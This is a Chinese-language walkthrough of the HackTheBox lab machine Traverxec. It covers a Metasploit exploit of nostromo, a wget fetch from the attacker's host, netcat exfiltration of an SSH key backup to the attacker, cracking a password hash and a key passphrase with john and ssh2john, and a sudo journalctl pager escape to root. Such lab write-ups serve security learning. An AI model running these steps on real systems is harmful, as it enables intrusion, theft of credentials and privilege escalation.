Traverxec(ssh2john爆破id_rsa对应密码)

参考资料:https://whale3070.github.io/training/2019/01/07/x/

10.10.10.165

1
2
3
4
5
6
7
8
9
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

web

searchsploit nostromo

1
2
3
4
5
nostromo nhttpd is prone to a remote command-execution vulnerability because it fails to properly validate user-supplied data.

An attacker can exploit this issue to access arbitrary files and execute arbitrary commands with application-level privileges.

nostromo versions prior to 1.9.4 are affected.

msfconsole

1
2
3
4
5
search nostromo
use 0
set RHOSTS 10.10.10.165
set LHOST 10.10.14.8
run

得到一个www-data权限的shell

cat /etc/passwd | grep home
david:x:1000:1000:david,,,:/home/david:/bin/bash

1
python -c 'import pty; pty.spawn("/bin/bash")'

不尝试内核漏洞提权

1
2
3
4
uname -a
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64 GNU/Linux

whereis gcc

没有编译器,故不尝试内核漏洞提权。

1
2
3
4
5
6
7
8
9
10
11
12
wget http://10.10.14.4:8000/linux-exploit-suggester.sh -P /tmp

chmod +x /tmp/linux-exploit-suggester.sh

cd /tmp;./linux-exploit-suggester.sh
Possible Exploits:

[+] [CVE-2009-1185] udev 2

   Details: https://www.exploit-db.com/exploits/8478/
   Download URL: https://www.exploit-db.com/download/8478
   Comments: SSH access to non privileged user is needed. Version<1.4.1 vulnerable but distros use own versioning scheme. Manual verification needed

查找机密文件

find / -name “index.html” 2>/dev/null
找到web目录,查看是否有config文件
/var/nostromo/htdocs/index.html

find / -name “*rsa” 2>/dev/null
没找到

find / -name “ssh“ 2>/dev/null

find / -name “backup*” 2>/dev/null

cd /var/nostromo/conf;cat .htpasswd

david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

1
2
3
cd /home
ls -al
drwx--x--x  5 david david 4096 Oct 25 17:02 david

其他用户只有可执行权限,没有可读权限

cd /var/nostromo/conf;cat nhttpd.conf

1
2
3
4
# HOMEDIRS [OPTIONAL]

homedirs		/home
homedirs_public		public_www

从这里得知,/home/david可能有public_www的目录

1
2
3
cd /home/david/public_www;ls -al
cd  /home/david/public_www/protected-file-area;ls -al
download backup-ssh-identity-files.tgz backup.tgz

不能用download命令,只有meterpreter才可以使用download进行文件下载。

kali主动连接目标机器,失败
nc -lnvp 8888 < backup-ssh-identity-files.tgz
端口不能小于1024

nc 10.10.10.165 8888 -w 10 > backup-ssh-identity-files.tgz

目标机器主动连接kali,成功
kali: nc -lnvp 8888 > backup-ssh-identity-files.tgz
目标机器:nc 10.10.14.8 8888 -w 10 < backup-ssh-identity-files.tgz

解压
gunzip backup-ssh-identity-files.tgz
解压后,发现/home/david目录下有authorized_keys id_rsa id_rsa.pub

密码破解

john –wordlist=rockyou.txt whatpass.txt

1
2
3
4
5
6
7
8
9
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
Nowonly4me       (?)
1g 0:00:04:04 DONE (2019-12-30 15:08) 0.004088g/s 43248p/s 43248c/s 43248C/s Noxema..Nowhere
Use the "--show" option to display all of the cracked passwords reliably
Session completed

加密格式为md5crypt-long,尝试切换用户,失败
su david/Nowonly4me

su root/Nowonly4me
失败

ssh登陆

ssh david@10.10.10.165 -i id_rsa
输入密码Nowonly4me,失败

1
2
3
locate ssh2john
cd /usr/share/john
python ssh2john.py

运行后提示了用法

1
2
3
4
5
python ssh2john.py /root/Documents/target/165/home/david/.ssh/id_rsa > /tmp/out.txt

cat /tmp/out.txt

john /tmp/out.txt --wordlist=/usr/share/wordlists/rockyou.txt

得出了id_rsa对应的密码

提权

参考资料:https://gtfobins.github.io/gtfobins/journalctl/

journalctl 用来查询 systemd-journald 服务收集到的日志。
再次尝试ssh登陆,ssh david@10.10.10.165 -i id_rsa,输入密码,登陆成功。

1
2
3
4
cd /home/david/bin;ls
cat *.conf
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
!/bin/bash

总结

本次学到了两个知识点:

  1. locate ssh2john

    1
    2
    python ssh2john.py id_rsa > out.txt
    john out.txt --wordlist=字典

    可以在有id_rsa私钥的情况下,爆破ssh密码

  2. 通过二进制可执行程序的提权方式gtfobins,下次再开一篇讲解。